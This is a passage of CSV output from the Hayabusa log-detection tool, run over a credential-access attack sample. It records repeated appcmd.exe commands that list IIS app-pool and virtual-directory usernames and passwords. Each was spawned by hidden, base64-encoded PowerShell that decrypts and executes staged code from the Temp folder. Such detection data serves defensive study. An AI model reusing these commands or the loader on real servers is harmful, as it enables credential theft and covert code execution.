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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.432 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: 
C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AY
QBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.323 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.403 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.473 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAd
wAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.563 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.784 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.894 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir 
